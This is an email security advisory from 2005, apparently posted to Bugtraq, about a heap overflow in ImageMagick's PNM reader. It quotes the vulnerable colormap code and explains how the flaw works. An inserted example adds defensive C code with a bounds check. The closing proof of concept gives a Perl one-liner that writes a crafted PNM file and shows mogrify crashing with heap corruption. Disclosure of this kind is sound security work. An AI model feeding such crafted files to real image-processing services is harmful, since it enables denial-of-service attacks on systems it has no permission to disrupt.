Message-ID: <20050425072940.6925fbef.pucik@overflow.pl>
Date: Mon, 25 Apr 2005 07:29:40 +0200
From: Damian Put <pucik@...rflow.pl>
To: bugtraq@...urityfocus.com
Subject: [Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow


Overflow Security Advisory #3

ImageMagick ReadPNMImage() Heap Overflow

Vendor: ImageMagick (http://www.imagemagick.org)
Affected version: 6.x up to and including 6.2.1
Vendor status: Fixed version released (6.2.2)

Author: Damian Put <pucik@...rflow.pl>
URL: http://www.overflow.pl/adv/imheapoverflow.txt
Date: 25.04.2005

1. Background

ImageMagick is a free software suite to create, edit, and compose bitmap images.
It can read, convert and write images in a large variety of formats.

http://www.imagemagick.org


2. Description

Remote exploitation of a heap overflow vulnerability could allow execution of
arbitrary code or cause a denial of service.

A heap overflow exists in the ReadPNMImage() function, which is used to decode
PNM image files. The vulnerable code is:


coders/pnm.c:

static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
    if ((format == '1') || (format == '4'))
      max_value=1;  /* bitmap */
    else
      max_value=PNMInteger(image,10);
    image->depth=max_value < 256 ? 8UL : QuantumDepth;
    if ((format != '3') && (format != '6'))
      {
        image->storage_class=PseudoClass;
        image->colors=(unsigned long) (max_value >= MaxColormapSize ?
          MaxColormapSize : max_value+1);
      }
...
        if (AllocateImageColormap(image,image->colors) == MagickFalse)
          ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
        if (format == '7')
          {
            /*
              Initialize 332 colormap.
            */
            i=0;
            for (pixel.red=0; pixel.red < 8; pixel.red++)
              for (pixel.green=0; pixel.green < 8; pixel.green++)
                for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                {
                  image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                  image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                  image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                  i++;
                }
          }
...

We can manipulate the image->colors value, because it is derived from "max_value"
(capped at MaxColormapSize). Memory for image->colormap is allocated based on the
image->colors variable (in the AllocateImageColormap() function). If the value of
"image->colors" is, for example, 1, only 1*sizeof(PixelPacket) bytes of memory are
allocated. Next, when the format of the PNM file is "7", the image->colormap buffer
is initialized with the 332 colormap, which is a fixed 8*8*4 = 256 entries regardless
of "max_value". If image->colors*sizeof(PixelPacket) bytes are not enough for it, heap
structures are overwritten. We cannot control the contents of this buffer, so execution
of arbitrary code is very difficult or impossible, but we can crash the program easily.
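To make the sizing mismatch concrete, the following is an added example that is not part of this advisory and not ImageMagick's source. It models the colormap sizing logic quoted above from coders/pnm.c, computes how many entries the format-'7' initializer writes, and adds the bounds check that the vulnerable path lacks. MAX_COLORMAP_SIZE, the PixelPacket struct and the quantum scaling are stand-ins for the real ImageMagick definitions; their values here are assumptions.

```c
/* Added example: models the colormap sizing from the quoted ReadPNMImage()
 * excerpt and adds the missing check.  Not ImageMagick's code; the constants
 * and PixelPacket layout below are assumed stand-ins. */
#include <stdio.h>
#include <stdlib.h>

#define MAX_COLORMAP_SIZE 65536UL              /* assumed stand-in for MaxColormapSize */
#define COLORMAP_332_ENTRIES (8UL * 8UL * 4UL) /* 8 red x 8 green x 4 blue = 256 */

typedef struct { unsigned short red, green, blue, opacity; } PixelPacket; /* stand-in */

/* Mirrors the quoted logic: how many colormap entries get allocated for a
 * given PNM format and max_value.  Formats '3' and '6' carry no colormap. */
unsigned long pnm_colormap_entries(char format, unsigned long max_value)
{
    if (format == '1' || format == '4')
        max_value = 1;                         /* bitmap */
    if (format == '3' || format == '6')
        return 0;                              /* DirectClass: no colormap */
    return max_value >= MAX_COLORMAP_SIZE ? MAX_COLORMAP_SIZE : max_value + 1;
}

/* The check the vulnerable path lacks: the format-'7' initializer writes a
 * fixed 256 entries, so the colormap must hold at least that many. */
int pnm_colormap_init_is_safe(char format, unsigned long max_value)
{
    unsigned long entries = pnm_colormap_entries(format, max_value);
    if (format != '7')
        return 1;                              /* no 332 initializer on this path */
    return entries >= COLORMAP_332_ENTRIES;
}

/* Hardened initializer: fills the 332 colormap only when the buffer can hold
 * it, and reports failure instead of writing past the end. */
int init_332_colormap(PixelPacket *colormap, unsigned long colors)
{
    unsigned long i = 0, r, g, b;
    if (colormap == NULL || colors < COLORMAP_332_ENTRIES)
        return 0;                              /* would overflow: refuse */
    for (r = 0; r < 8; r++)
        for (g = 0; g < 8; g++)
            for (b = 0; b < 4; b++) {
                /* scale 3/3/2-bit components to a 16-bit quantum (assumed) */
                colormap[i].red     = (unsigned short)(r * 0xFFFF / 0x07);
                colormap[i].green   = (unsigned short)(g * 0xFFFF / 0x07);
                colormap[i].blue    = (unsigned short)(b * 0xFFFF / 0x03);
                colormap[i].opacity = 0;
                i++;
            }
    return 1;
}

int main(void)
{
    /* Constructed header values matching the advisory's case: format 7, max_value 1 */
    unsigned long colors = pnm_colormap_entries('7', 1);
    PixelPacket *cm;

    printf("P7 with max_value=1 allocates %lu entries; initializer needs %lu: %s\n",
           colors, COLORMAP_332_ENTRIES,
           pnm_colormap_init_is_safe('7', 1) ? "ok" : "overflow, reject");

    cm = calloc(colors, sizeof(*cm));
    if (cm == NULL)
        return 1;
    if (!init_332_colormap(cm, colors))
        puts("hardened initializer refused the undersized colormap");
    free(cm);
    return 0;
}
```

The point of the check is that the required size on the format-'7' path is a constant of the initializer, not a function of the header's max_value, so the reader-side validation must compare against that constant (or the allocation must be raised to it) before the loop runs.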


3. PoC

Example crafted PNM file:

bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

We can test vulnerability with "mogrify" - standard ImageMagick utility:

bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$

